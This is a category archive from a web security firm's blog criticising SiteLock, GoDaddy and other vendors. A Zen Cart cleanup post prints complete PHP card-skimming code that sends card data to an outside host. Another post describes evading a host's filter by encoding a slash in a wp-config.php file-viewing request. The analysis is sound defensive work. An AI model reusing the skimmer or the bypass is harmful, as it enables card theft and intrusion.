Don’t Get Caught With Plugin VulnerabililitesWith our Plugin Vulnerabilities service you are alerted if you any of the WordPress plugins you use contain a security vulnerability.
Search This Blog
- Sucuri Makes A Persuasive Case That You Should Avoid Using Their Services
- SiteLock Promotes The Idea That Protecting Websites Involves Leaving Them Vulnerable to Being Hacked
- HostGator Is Actively Hiding the True Nature of Their Partnership With SiteLock
- Cyber Security Company’s Poor Website Security Reminder of Industry’s Lack of Focus On Actually Improving Security
- ZDNet’s Zero Day Blog Doesn’t Understand What A Zero-Day Vulnerability Is
Web Software Updates
Did We Make a Mistake?While it seems to be acceptable for blogs discussing web security to contain numerous factual mistakes, we hold ourselves to a higher standard. We only write about things that we actually understand and only after we have double checked the information. So if you see a mistake in one of our posts please leave a comment on the post or contact us so that we can add a correction.
Category Archives: Bad Security
In a recent post about how WordPress is giving the web security SiteLock unwarranted legitimacy by allowing them to be involved in WordCamps, conferences dedicated to WordPress, we mentioned that one of the reasons it didn’t seem great to have them was that they are falsely labeling WordPress website as having vulnerabilities due to their lack of understanding of how WordPress handles security updates. It turns out their lack of knowledge of WordPress extends further, leading to trying to sell people services that are not relevant to them, as we found while looking for information for another post.
In a March post entitled This Week in Exploits: Increased WordPress.com Security on SiteLock’s WordPress focused The District blog, SiteLock mentioned that WordPress.com had enabled HTTPS for those using custom domain names. For those not familiar, WordPress.com is a blog hosting service powered by the WordPress software. It has some rather notable differences with self hosted WordPress installations, some of which we will note in a bit. It seems that SiteLock is not familiar with the differences the WordPress.com service and the WordPress software, but that didn’t get in the way of them trying to use the blog post to sell people on unneeded services.
After a paragraph mentioning the HTTPS change, they pivot to selling their service:
If you’re a WordPress.com user, one way to take advantage of WordPress.com’s exemplary efforts is to go further and enhance the security of your WP.com site with protection services.
First they promote a web application firewall:
The first and probably most fundamental upgrade to your site’s security is to implement a web application firewall, or WAF. With a simple DNS change and SSL cert approval, SiteLock TrueShield WAF protects sites, WordPress.com or otherwise, from malicious traffic, suspicious bots, scrapers and spam comments. The PCI-compliant TrueShield WAF supports SSL and Extended Validation SSL. Service packages depend upon protection capabilities desired.
Considering how the WordPress.com service works it isn’t clear what value that would provide. Much of that would likely already be being done WordPress.com and if there was some vulnerability discovered it should impact the whole service, so you would expect that it would be quickly fixed across the service. The marketing materials for that also don’t present any evidence as to the efficacy of its protection provided by that in general, much less when used with WordPress.com.
Next SiteLock is promoting malware scanning:
The next upgrade to WordPress.com security is a malware scan. The SiteLock Malware Scan crawls websites looking for malicious code and links and immediately alerts the site owner if any are found. The Malware Scan runs daily to find malware early and keeps sites off of blacklists, and results can be viewed in the SiteLock Dashboard or downloaded as CSV for analysis and remediation.
Next up they try create a connection between spam and the “dreaded ‘reported attack site’ screen”:
Speaking of blacklists, the final security upgrade is a spam scan. The SiteLock Spam Scan monitors all industry-leading search engine and spam blacklists for the customer’s domain and, again, immediately alerts the customer to any adverse reports. This allows the quickest way to remediation if the worst happens, reducing, if not eliminating, customer interaction with the dreaded ‘reported attack site’ screen.
The Reported Attack Site screen refers to something that has been shown on the Firefox web browser when Google has detected malware on a website, not spam, which is something SiteLock should know. From this description isn’t clear what spam they are scanning for, since it could refer to spam emails or spam content on a website. In looking around for more information on what the Spam Scan actually does, it looks like it actually checks lists of email address claimed to be sending spam, so it isn’t clear what the search engine reference in this refers to. Unless you use your own domain with WordPress.com and send email through it (which wouldn’t be through WordPress.com) this wouldn’t be relevant.
Finally SiteLock brings up their plugin for WordPress:
Security is vital. Easy security management is a must. SiteLock Security Plugin for WordPressprovides complete website security management and allows users to access their SiteLock Dashboard from within WordPress. Highlights include real-time updates ensuring minimal latency between identifying and correcting issues, identifying specific vulnerabilities in order to remediate them as quickly as possible and managing SiteLock Trust Seal settings.
That will not work on WordPress.com blogs, since you can’t install plugins on them.
We have seen a lot of ridiculous stuff from SiteLock recently, but this has to take the cake. They have now filed a DMCA takedown notice against our website for including a screenshot of their homepage on in one our posts.
In a post discussing how SiteLock was labeling a website as being “secure” while that contained malicious code that compromised credit card credentials we had included a screenshot of their homepage backing our mention of them claiming to be the “The Global Leader in Website Security”.
You can see how that portion of the page looked before the takedown:
Beyond the fact that it is fairly clearly fair use, what is the purpose of hiding people from seeing that on our website?
They also filed a notice against another image. This time it is even more clear to be fair use since in a post discussing how SiteLock is falsely claiming that WordPress installations have vulnerabilities, we included the screenshot from their post to discuss the fact they were showing vulnerabilities existing in a version of WordPress they didn’t exist in that version.
You can see how that portion of the looked before the takedown:
Worth noting is that the textual content in SiteLock’s screenshot is actually not generated by them, instead copied from other sources.
What makes this even more ridiculous is they clearly now know that their post is showing that they lack a basic understanding of WordPress security, but instead of fixing their post, they are trying to hide you from seeing an image on our website.
The only reasonable explanation we can think of for them doing this is that they thought they could get the pages those images were on removed by filing this, because removing the images alone doesn’t do anything to cover up what they are up to.
Full DMCA Takedown Notice
My name is Logan Kipp, I am contacting you on behalf of my company
SiteLock, LLC. A website that your company hosts at IP *22.214.171.124* (
WHITEFIRDESIGN.COM) is infringing on at least one copyright owned by
Content has been taken from our official websites, SiteLock.com and
wpdistrict.sitelock.com, and used without the authorization of
SiteLock, LLC on the website WHITEFIRDESIGN.COM.
Infringement Instance #1:
ORIGINAL image URL: https://wpdistrict.sitelock.com/wp-
INFRINGING image used in page:
INFRINGING image URL: http://www.whitefirdesign.com/blog/wp- content/uploads/2016/09/sitelock-false-wordpress-
Infringement Instance #2:
ORIGINAL content URL: https://www.sitelock.com
INFRINGING content used in page:
INFRINGING image URL: http://www.whitefirdesign.com/blog/wp- content/uploads/2016/02/sitelock-global-
This letter is official notification under United States Code Title 17
Section 512(c), the Digital Millennium Copyright Act (DMCA), and
I seek the removal of the aforementioned infringing material from your
servers. I request that you immediately notify the infringer of this
notice and inform them of their duty to remove the infringing material
immediately, and notify them to cease any further posting of
infringing material to your server in the future.
*Please also be advised that United States Code Title 17 512
requires you, as a service provider, to remove or disable access to
the infringing materials upon receiving this notice.* Under US law a
service provider, such as yourself, enjoys immunity from a copyright
lawsuit, provided that you act with deliberate speed to investigate
and rectify ongoing copyright infringement. If service providers do
not investigate and remove or disable the infringing material this
immunity is lost. Therefore, in order for you to remain immune from a
copyright infringement action you will need to investigate and
ultimately remove or otherwise disable the infringing material from
your servers with all due speed should the direct infringer, your
client, not comply immediately.
I am providing this notice in good faith and with the reasonable
belief that rights that SiteLock, LLC owns are being infringed. Under
penalty of perjury I certify that the information contained in the
notification is both true and accurate, and I have the authority to
act on behalf of the owner of the copyright(s) involved.
Should you wish to discuss this with me please contact me directly.
8701 E. Hartford Dr.
Scottsdale, AZ 85255
Phone: 1-877-257-9263 x 9012
CONFIDENTIALITY NOTICE: The information contained in this email,
including any attachment(s), is confidential information that may be
privileged and exempt from disclosure under applicable law, and is
intended only for the exclusive use by the person(s) mentioned above
as recipient(s). If you are not the intended recipient, you are hereby
notified that any disclosure, copying, distribution, or use of the
information contained herein is strictly prohibited and may be
unlawful. If you received this transmission in error, please
immediately contact the sender and destroy the material in its
entirety, whether in electronic or hard copy format.
We often say that most security companies don’t know and or care much about security, as quick example let’s take a look at a company named CMSHelplive.com that advertises to clean up hacked Joomla website on Google. Considering that keeping the software up to date is a basic element of security and when doing a proper hack cleanup you should make sure the website is secure as possible (so the software on the website should be brought up to date) you would expect that their website is running an update to version of their CMS. But it isn’t:
Joomla 1.7 reached it end of life back in February of 2012. So this company has not updated their software in over four and half years and have missed over 30 subsequent updates that included security fixes. When they are not even keeping their website secure, what are the chances that they are going make sure the website they cleaned up are actually secured after their work?
And of course they are also peddling the falsehood that brute force attacks against WordPress admin passwords are happening:
As we have continued to hear more troubling stories from the public about the web security SiteLock’s business practices and seen the damage they can cause, we have been very troubled that other organizations would provide them with legitimacy by getting involved with them.
One set of organizations is the various web hosts that had partnered with them. We recently found that the CEO of the parent company of many of those web hosting partners is also the owner of SiteLock, so it isn’t surprising that those web hosts wouldn’t have a problem with what is going on since their CEO is in on it. It would seem the others are getting paid handsomely to help them out.
Due to SiteLock discovering a couple of vulnerabilities in WordPress plugins some time ago, we had started following their blog for Plugin Vulnerabilities service. While no more vulnerabilities were disclosed on the blog, we did start noticing that they were sponsoring and attending quite a few of the official conferences for WordPress, WordCamps (and oddly giving presentations unrelated to security, including Creating a Digital Download Business – What to Sell, How to Sell It and Shortcuts to Success. and Contact Forms are Boring – 5 Creative Ways to Use Forms in WordPress.). That seems like a really bad idea, considering that imprimatur of WordPress is then connected with this company, provided them legitimacy they shouldn’t have.
There is also the issue that money that SiteLock makes taking advantage of people funding these WordCamps, which seems to be reasonable to consider as a moral and ethical issue.
It also doesn’t seem to be great idea to have a company that has shown that they lack a basic understanding of how WordPress responds to security isues, leading them falsely claim that WordPress website contain critical vulnerabilities, involved with WordPress events.
Just in the next couples of weeks SiteLock is sponsoring WordCamps in Pittsburgh, Raleigh (with a presentation also not security related, Using Curated Content in WordPress—Why and How), and Dallas. They are also a sponsor of the WordCamp for the whole US in December.
We would like be able to give you WordPress and WordCamp’s side of the story as to why they have are involved with SiteLock, but it has been a week since we contacted them with the following email asking for comment and we haven’t received any response:
We are writing a post about the fact that the security company SiteLock is being allowed to sponsor and attend numerous WordCamps despite be well known for taking advantage of its customers.
We first became aware of their practices after we had written a number of posts about other issues we had noticed involving them and then we started getting contacted by people who had been take advantage of by them, http://www.whitefirdesign.com/blog/2016/05/03/it-looks-like-sitelock-is-scamming-people/. There are a litany of complaints that can be see if you do a search on Google for something like “SiteLock scam”, including this page with numerous complaints https://sitelock.pissedconsumer.com/. While some of the complaints seem to be unfair to them, there is a pretty clear pattern of actions that seem quite problematic, to say the least.
We would like to include in our post any comment you might have as to why they are allowed to sponsor and attend WordCamps in light of that, so that the public has a better understanding of why WordCamps would get involved with such a company and take money that has been made by taking advantage of people. We would also like to include in our post any comment you might have as to any restrictions you place on what kinds of companies can sponsor and attend WordCamps.
If they were not aware of SiteLock’s reputation before, it seems that could have at least indicated that and that they reviewing things, but the lack of response points to them being aware of what SiteLock does and being okay with being involved with them.
If would like to let them know how you feel about that you can contact the central organization for WordCamp’s here. You also might want to contact ones happening locally that SiteLock is involved in, to see if they are aware of what one their sponsors is up to.
Hosting Recommendation Too
This isn’t the only Sitelock connection with WordPress. As we discussed in a recent post, one of the owners of Sitelock is also the CEO of a major web hosting provide, Endurance International Group. Endurance has many brand names they provide web hosting under, one of those being Bluehost. Bluehost has come up repeatedly in complaints about Sitelock. Bluehost is also one of the web hosts listed on the Hosting page on wordpress.org:
That page has a top level menu link of the website, so we would assume that brings in a lot of business to them.
In the complaints about the web security company SiteLock we have seen, one of the things that comes up frequently is the widely variable and often times excessive prices for their services. In some cases the pricing would be within reason if you were getting a high quality service, but as we found while helping to fix a website after SiteLock did a malware removal on it few days ago, you get the opposite of that from them.
This incident involved one of SiteLock’s partner web host, though not one the ones run by the owners of SiteLock. Instead it is GoDaddy, for which we found a couple of security issues on their end while looking into this as well.
What happened in this cases is that SiteLock through GoDaddy was hired to clean up malware on the website. Afterwards though the website was screwed up, with the styling gone and shortcodes showing up on the pages (instead of being processed). GoDaddy told the website’s owner that they would need to have someone update WordPress and re-install the theme they used.
None of this made a whole lot of sense. After removing malware or doing some other cleanup the website should appear as it did before. The theme shouldn’t be missing, unless it had been completely replaced with malicious code (which we have never seen happen). Also a part of a proper cleanup is making the website secure as possible, which would, in part ,involve updating the software on the website.
When we got in to the WordPress admin area to look over things we found that theme actually was still there, but wasn’t activated. The only reason we could think for changing to another theme would be to check if the theme being used was causing the malware to be served up, but after that checking was finished it should be reactivated.
We also found that all of the plugins were deactivated, the same explanation as the theme might explain them being deactivated. But again they should have been reactivated if that was the case. This was more problematic to deal with since we didn’t know which, if any, of the plugins were not active before the cleanup and did not need to be re-activated.
Not only did WordPress still need to be updated, but so did the plugins and themes.
Once we got a handle of those things we were able to bring the website back to working order, but further looking showed that items added by the hacker still existed (and would have allowed them continued wide access to the website) and the vulnerability that could have allowed the hacker access to begin with still existed on the website, so the hacker could have easily gotten back in.
Malicious Administrators and a Vulnerable Plugin
When cleaning up a hacked WordPress website one of thing you want to check for is the existence of users that should not exists, with an emphasis on users with Administrator role, since they have wide ranging access. Sometimes those added accounts are rather obvious, in the case of this website a couple had the email adress “email@example.com”. While seemly intended to look innocuous, there shouldn’t be any account with email addresses from wordpress.org on a website. Either SiteLock did not spot those or didn’t even do any check for that.
Looking at the details of the users in the database would tell you something more about this. In the following screenshot you can see that for the two account with the “firstname.lastname@example.org” and one other have the user_registered field not filled in (the others listed there have dates from before the website existed and before the original account on the website was created):
That indicates that the accounts were not created through the normal process in WordPress. One other way to do that is with direct access to the database.
That brings us to another thing that SiteLock missed, one the installed plugins, Revolution Slider, had an arbitrary file viewing vulnerability in the version of the plugin installed (you can check if a website is using a vulnerable version of that and if other plugins have vulnerabilities hackers are targeting using our Plugin Vulnerabilities plugin). Hackers frequently target that type of vulnerability to try to view the contents of WordPress configuration file, wp-config.php. That file contains database credentials for the website, so accessing that could allow a hacker access to the database, which they could then use to add new users.
GoDaddy’s Security Failings
We then went to check to see if the vulnerability was in fact exploitable on the website and we found that connection was dropping when we made the request to exploit it, which looked to be GoDaddy blocking the request. Unfortunately their protection is incredibly easy to evade.
The original request we made was the following, which was stopped:
This request was not stopped:
The only change was that the “/” right before “wp-config.php” has been encoded, changing it to “%2”.
The fragility of such protection seems to pretty common, as earlier this week we found that two WordPress security plugins protection against another vulnerability could bypassed by simply adding and “\” in the right location (the 9 other WordPress security plugins we tested provided no protection).
Remote Database Access
Even if a hacker gets the database credentials by exploiting an arbitrary file viewing vulnerability they still need some method to access the database. In the case of the database for the website remote access is permitted, which allows someone to connect to the database from outside of GoDaddy’s systems. That type of access makes it really easy for a hacker, so it should be disabled by default.
In looking how we could disable remote access to the database, we found that based on their documentation it shouldn’t have even been enabled. The documentation says that you need to enable direct access when creating a database for to connect remotely:
If you want to connect remotely to a database, you must enable Direct Database Access when setting it up1 — you cannot enable it later.
But the database in question is listed as not allowing direct access:
So something isn’t right.
If we didn’t know what SiteLock was up to at this point we would be asking why they had not noticed those problems with the partner GoDaddy’s security and gotten them to fix them, but knowing what they are doing it isn’t surprising they wouldn’t have done that. If anything getting their partners to improve their security would mean less money for them and less money for the partners as well.
When it comes to web security companies, our experience has been that most of them don’t seem know and or care about security, which we think that goes a long way to explaining why web security is in such bad shape. One company that fits that bill for that is SiteLock, as can be seen in just few of our previous posts on them, whether its them failing to properly clean websites, to claiming website was secure when it contained malicious code to compromise credit credentials, to falsely claiming that WordPress websites have vulnerabilities due not understanding how WordPress handles security. More recently SiteLock has sets itself apart from the average bad security company in our eyes, by combining that with activity that looks more like outright scamming.
In looking into SiteLock one of the things that has stood out for us is that they have partnerships with with so many web hosts. Based on their poor track record when it comes to security we assumed that that the partnerships had to do with money being paid to the web hosts and not on those web hosts feeling that SiteLock providing a quality service. This seemed even more true as the complaints have piled up against SiteLock, which have frequently also cited their partnered web hosts. If it wasn’t about money, they easily could have found another security company to partner with that wouldn’t damage their reputation in this way.
As we discussed yesterday, it turns out that part of the actual explanation for why some web hosts had partnered with SiteLock has a more troubling explanation. The CEO of Endurance International Group, which provides web hosting services under a variety different brand names (including A Small Orange, Bluehost, FatCow, HostGator, HostMonster, iPage, and IPOWER) is also one of the majority owners of Sitelock (a board member of Endurance International Group is the other majority owner along side them).
While looking into that situation we found confirmation that at least with that company, they are getting a portion of the fees for SiteLock’s services. As noted here in the prepared remarks for earning conference call in May of last year Endurance International Group disclosed that they get a majority of the SiteLock fees from their partnership (PDF):
The revenue share between Endurance and IBS for Sitelock has been set at 55%/45% in favor of Endurance.
That goes a long way to explaining why web hosts are willing to get involved with SiteLock, despite the potential damage to their reputation. Consider this comment on one of our previous posts:
Listen to this: Bluehost persuaded me to get Sitelock security for my website and I stupidly paid $500 for a year. This was in January. Yesterday, Sitelock alerted me to malware on my site that could result in terrible consequences. They would remove the malware for a one-time fee of $300! I contacted them to say, “WHAT WAS THE $500 for??” and a hostile character calling himself “sean” told me it was for “scanning.” This company needs to be stopped from continuing their predatory practices.
The web host would be getting $275 a year without having to do any work, versus the $131.88 they would receive for what they claim is their most popular shared web hosting plan at its normal price (for which they would also have the expenses associated with provide the web hosting).
This also seems to go a long way to explaining why SiteLock’s services sometimes come with extremely high prices, since they are getting less than half of the fee being paid.
If you wondering how much money we are talking about, the conference call remarks also listed the payout they made to SiteLock in financial year 2014:
Revenue share payments to IBS related to Sitelock totaled $5.4 million in FY14.
SiteLock is a web security company that we had originally became aware and wrote a number of posts about due to our seeing the poor quality of their services when working on client’s websites that had previously used their services. Due to those posts we started started getting contacted about more serious issues with them, namely that in a lot of cases they seem to be scamming people. One of the things that has stood out to us in looking into the situation was the fact that so many web hosts have partnered and continued to stay partnered with them. Was the money that we assumed SiteLock was paying them for the partnership worth the damage to their reputation, seeing as in complaints about them the web host who had partnered with them is frequently brought up?
In looking for some information for another post about the company we ran across the fact that the CEO of a major web hosting provider is also the one of the owners of SiteLock (the other owner is a director of the same provider), which does a lot to explain their partnerships and also raises even more question as to the probity of what is going between them.
On the about page of SiteLock’s website there is no mention of the ownership of the company, doing a Google site search of their website didn’t bring up any mention of either of the two entities that appear to be their parent company.
On the website of one of those, UnitedWeb, SiteLock is shown as one of their brands of the company, while the web hosting companies Endurance International Group and IPOWER are listed as public companies:
The connection between of all of those entities isn’t clear based on that, though.
A little searching brought us to this page that seemed to point to a direct connection between SiteLock and Endurance International Group, which with more checking seems to be confirmed. In Endurance International Group latest quarterly report it states that:
The Company also has agreements with Innovative Business Services, LLC (“IBS”), which provides multi-layered third-party security applications that are sold by the Company. IBS is indirectly majority owned by the Company’s chief executive officer and a director of the Company, each of whom are also stockholders of the Company.
What is Innovative Business Services? That is the entity that owns SiteLock (referred to as a member on that page). So the CEO and a director of Endurance International Group are the owners of SiteLock.
It not clear where UnitedWeb falls in that, but it looks like it might be the owner of Innovative Business Services, and then in turn that is owned by the CEO and directory of Endurance International Group.
Unless you are very involved in website hosting you probably don’t recognize the name Endurance International Group, but they own many well known web hosts. The brands page of their website they highlight some of the more high profile ones including A Small Orange, Bluehost, FatCow, HostGator, iPage, and IPOWER:
But that just scratches the surface, here is the all of their current brands (most of them appear to be web hosting companies) as listed on the Wikipedia page for the company:
- Arvixe LLC
- A Small Orange
- Berry Information Systems L.L.C.
- Constant Contact
- Escalate Internet
- HostV VPS
- Intuit Websites
- Networks Web Hosting
- SEO Gears
- SEO Hosting
- SEO Web Hosting
- Southeast Web
- SuperGreen Hosting
- Unified Layer
- Webzai Ltd.
- Webstrike Solutions
Its Not Hard To Find The Source of a Credit Card Compromise in Zen Cart If You Know What You Are Doing
When it comes to dealing with hacked websites there are lots of people who feel it is appropriate for them to do that work without seeming to have any of the expertise needed to be able to properly do the work. We often see the end result of that when we are brought in to re-clean hacked websites after somebody else did it and then the website got re-hacked. We usually find that the original people doing the cleanup didn’t even attempt to do central parts of the cleanup (like determining how the website was hacked). The lack of expertise also showed up recently we were contacted about a Zen Cart based website where credit card information was seeming to be compromised on the website, as fraudulent charges were being made to credit card accounts after they were used on the website.
When we were contacted about this we were confused by a question raised, which was if we charge if were not able to find the vulnerability. Why would someone charge if they were not able to complete the work? In answering that, we were told that other people had looked into this and had not been to identify the problem. That seemed odd to us, since we have never had a problem finding the source of a credit card breaches in the past. The fact that the people that couldn’t find it were then recommending resolving the by upgrading Zen Cart, seemed to point the not knowing what they are doing at all (since upgrading the software on a website is not the proper way to clean up a hacked website). But maybe the code that was compromising the credit card information was well hidden?
One of the easiest thing to do when looking for malicious code on a website is to compare the contents of its files to a freshly downloaded copy of the software being used on it. When we did that with this website we found that one of the files modified from its original form was /languages/english/checkout_confirmation.php. Based on the file’s name that would seem to be possible location where the code to compromise credit card information might be. The modification involved the following code having been appended to the file:
$data1 = $_POST['paypalwpp_cc_firstname']; $data2 = $_POST['paypalwpp_cc_lastname']; $data3 = $order->billing['street_address']; $data4 = ''; $data5 = $order->billing['city']; $data6 = $order->billing['state']; $data7 = $order->delivery['postcode']; $data8 = $order->billing['country']['iso_code_2']; $data9 = $order->customer['telephone']; $data10 = $_POST['paypalwpp_cc_number']; $data11 = $_POST['paypalwpp_cc_expires_month']; $data12 = $_POST['paypalwpp_cc_expires_year']; $data13 = $_POST['paypalwpp_cc_checkcode']; $data14 = ''; // credit card owner $data15 = "[redacted domain name]"; $data16 = $order->customer['email_address']; $data17 = ''; // county $post77 = "firstname=".($data1)."&lastname=".($data2)."&street1=".($data3)."&street2=".($data4)."&city=".($data5)."&state=".($data6)."&zip=".($data7)."&country=".($data8)."&phonenumber=".($data9)."&ccnumber=".($data10)."&expmonth=".($data11)."&expyear=".($data12)."&cvv=".($data13)."&comment1=".$data14."&comment2=".$data15."&email=".($data16)."&county=".($data17); $url = "http://magecard.xyz/add"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url); // set url to post to curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);// allow redirects curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); // return into a variable curl_setopt($ch, CURLOPT_TIMEOUT, 60); // times out after 4s curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post77); $result = curl_exec($ch); // run the whole process curl_close($ch);
Even if you not an all that familiar with PHP code it is pretty obvious that this code has something to do with credit card information. Combine that with the fact that that code is so different that legitimate code in the file, which involves defining the language to be used on the checkout confirmation page:
define('NAVBAR_TITLE_1', 'Checkout'); define('NAVBAR_TITLE_2', 'Confirmation'); define('HEADING_TITLE', 'Step 3 of 3 - Order Confirmation'); define('HEADING_BILLING_ADDRESS', 'Billing/Payment Information'); define('HEADING_DELIVERY_ADDRESS', 'Delivery/Shipping Information'); define('HEADING_SHIPPING_METHOD', 'Shipping Method:'); define('HEADING_PAYMENT_METHOD', 'Payment Method:'); define('HEADING_PRODUCTS', 'Shopping Cart Contents'); define('HEADING_TAX', 'Tax'); define('HEADING_ORDER_COMMENTS', 'Special Instructions or Order Comments'); // no comments entered define('NO_COMMENTS_TEXT', 'None'); define('TITLE_CONTINUE_CHECKOUT_PROCEDURE', '<strong>Final Step</strong>'); define('TEXT_CONTINUE_CHECKOUT_PROCEDURE', '- continue to confirm your order. Thank you!'); define('OUT_OF_STOCK_CAN_CHECKOUT', 'Products marked with ' . STOCK_MARK_PRODUCT_OUT_OF_STOCK . ' are out of stock.<br />Items not in stock will be placed on backorder.');
It is hard to see how this could have been missed unless the people trying to find it had no business getting involved in working on something like this.
As to the what allow the code to be added to the website, we were only able to track it back to a Russian IP address that looked to have already gained some level of access to the website. As they were able to login in to the Zen Cart backend and look to have been able to read and write to files on the website.
SiteLock Spreading False Information About WordPress’ Security To Their Customers Through Their Platform Scan for WordPress
A couple weeks ago we had a post about the WordPress security company Wordfence’s scary lack of security knowledge, which something they certainly are not alone in among security companies with a focus on WordPress. Another such company is SiteLock, that in a recent post announcing a new feature that is supposed to warn of known vulnerabilities in WordPress, showed they lack a basic of understanding of how WordPress handles security issues, leading to SiteLock warning their customers of WordPress vulnerabilities that don’t actually exist on their websites.
In the fourth paragraph of the post they say something that would red raise a big red flag from anyone who actually some knowledge of WordPress security:
Vulnerabilities can range from cross-site scripting (XSS) and SQL injection (SQLi), to authorization bypass. Issues are presented with their name, category, severity, a summary of the issue, and a more detailed description. For example, when scanning a WordPress website running v3.9.13, many serious vulnerabilities are found detailed in the scan report.
The reason for the red flag is that WordPress 3.9.13 is the latest version of WordPress 3.9, so that version should have little to no known security vulnerabilities. To understand why that it helps to understand how WordPress handles security updates. Back in WordPress 3.7 a new feature, automatic background updates, was introduced. This allows WordPress to automatically update between minor versions, so a website would automatically updated from 3.9.12 to 3.9.13, but would not automatically update to 4.0. Alongside of that WordPress started releasing security updates for older versions of WordPress that contain that feature, even as they moved on to newer versions of WordPress. So for example when the security release 4.5.3 was put out, so was 3.9.13, with the same fixes.
So while you should be keeping up to date with WordPress, if you are running WordPress 3.7 or above you should still be relatively secure against WordPress vulnerabilities since you would normally be getting those security updates. If you deal with the security of WordPress websites and in particular if you deal with cleaning up hacked websites, this is something you absolutely should know since it plays an important role in the determining the possible sources of the hack. SiteLock does those things, but clearly isn’t aware of this. Which you can tell by screenshot of their scan report warning about a couple of “Critical” severity vulnerabilities in WordPress 3.9.13 that don’t actually exist in that version:
[The following image is missing because SiteLock doesn’t want to you to be able see text they copied from other people’s websites.]
From the announcement post, WordPress 3.9.8 fixes three cross-site scripting vulnerabilities and a potential SQL injection that could be used to compromise a site (CVE-2015-2213).
It also includes a fix for a potential timing side-channel attack and prevents an attacker from locking a post from being edited.
From the announcement post:
- A serious critical cross-site scripting vulnerability, which could enable anonymous users to compromise a site.
- Files with invalid or unsafe names could be upload.
- Some plugins are vulnerable to an SQL injection attack.
- A very limited cross-site scripting vulnerability could be used as part of a social engineering attack.
- Four hardening changes, including better validation of post titles within the Dashboard.
The final paragraph of their post doesn’t show good grasp of the reality of securing WordPress websites:
In WordPress security, knowing you have a vulnerability is half the battle. Taking action to remediate vulnerabilities is the other half. Fortunately, as many WordPressers know, the majority of issues found will likely be resolved by simply updating the WordPress core, plugins and themes. However, most WordPress users don’t regularly check the WordPress.org forums or subscribe to notifications about plugins, so they may not be notified of major security issues that haven’t yet been patched. With the new Platform Scan for WordPress, we are increasing the visibility of security concerns to help you be the most informed WordPress user you can be.
Your focus should be first and foremost on keeping the software on your website up to date, since the reality is that you will not always know if a new version includes a security fix. So knowing about vulnerabilities is much less than “half the battle”. Another problem, we know from running our Plugin Vulnerabilities service, is that even if “regularly check the WordPress.org forums or subscribe to notifications about plugins” you won’t know about many unpatched vulnerabilities out there, as lots of vulnerabilities appear to be known and being exploited by hackers, but no one has been noticing them, until we started actually doing the work needed to find them. So could SiteLock play a similar role? It is possible, but based on their track record and the fact that they look to be just reusing existing vulnerability data (which doesn’t even include many vulnerabilities that we have disclosed that exist in the current versions of plugins) it seems unlikely. If you want to be most informed WordPress user when it comes plugin vulnerabilities then signing up for our service would do that over SiteLock’s.
SiteLock’s post doesn’t say where their data comes from (which raises another red flag), but what is shown in the scan results screenshot in their post it looks they are using data from the WPScan Vulnerability Database and adding in some additional information from the US-CERT/NIST. Considering that we have found that the WPScan Vulnerability Database has some serious quality issues when it comes to their listing of plugin vulnerabilities, SiteLock’s data is likely to also likely to have those issues as well.
We would have placed a comment on their post letting them of the problem with their data, but they don’t allow comments (maybe because they would be inundated with complaints about how they treat their customers).
Use of Very Outdated Versions of WordPress Security Plugin Is a Reminder of the Challenges to Improving Security
In cleaning up lots of hacked WordPress websites over the years one thing that we have noticed fairly often is that there are security plugins installed (that clearly didn’t actually protect the website from being hacked, since it got hacked) and on those websites the security plugin(s) and other installed plugins haven’t been kept up to date. Keeping the plugins up to date is going provide you a lot more protection than a security plugin is going to provide (if the security plugins provide any protection at all), so that combination surprised us at first. Even with that knowledge, something we ran across recently stuck out to us.
While doing some checks over security plugins for security issues in them for our Plugin Vulnerabilities service, we recently spotted a couple in the plugin Centrora Security. We have notified them of the issue and hopefully the vulnerabilities will be fixed soon. While looking over the plugin we noticed on the plugin’s Stats page that most of the active installs seem to be running quite out of date versions.
The current release, 6.5, is only used on 26.8 percentage of the websites using it according to wordpress.org’s data:
The breakdown for the other versions shown there are:
- 1.0: 12.5%
- 1.6: 29.2%
- 2.2.: 11.9%
- other: 19.6%
One possible explanation for that could have been that the plugin had jumped a lot of versions recently, but looking back at when the older versions were released shows that isn’t the case here. Version 1.0 was superseded with version 1.5 on February 13, 2013. Version 1.6 was superseded with version 2.0 on September 10, 2013. Version 2.2 was superseded with version 3.0 on April 4, 2014.
Another possibility would be that websites using the plugin are still on an older version of WordPress that isn’t’ compatible with newer versions of the plugin. The current version is listed as requiring WordPress version 3.7 or higher, which would make it compatible with the vast majority of WordPress websites based on WordPress’ chart of versions of WordPress currently being used:
Looking at what versions of WordPress were required for the old releases doesn’t seem to explain this as, as version 1.0.0 of the plugin required WordPress 3.3, version 1.6.0 also required 3.3, and version 2.2.0 required at least 3.5. So it is not as though the websites could be using a much older version of WordPress than 3.7.
When you have people concerned enough about security to install a security plugin, but not update it in years, despite keeping plugins up to date being an import and rather basic security measure, it points to the difficulty that there is in trying to improve the current poor state of security.
Since we are discussing keeping plugins up to date, don’t forget that we offer a plugin that will turn on WordPress’ ability to automatically update plugins, so you can easily keep your plugins up to date.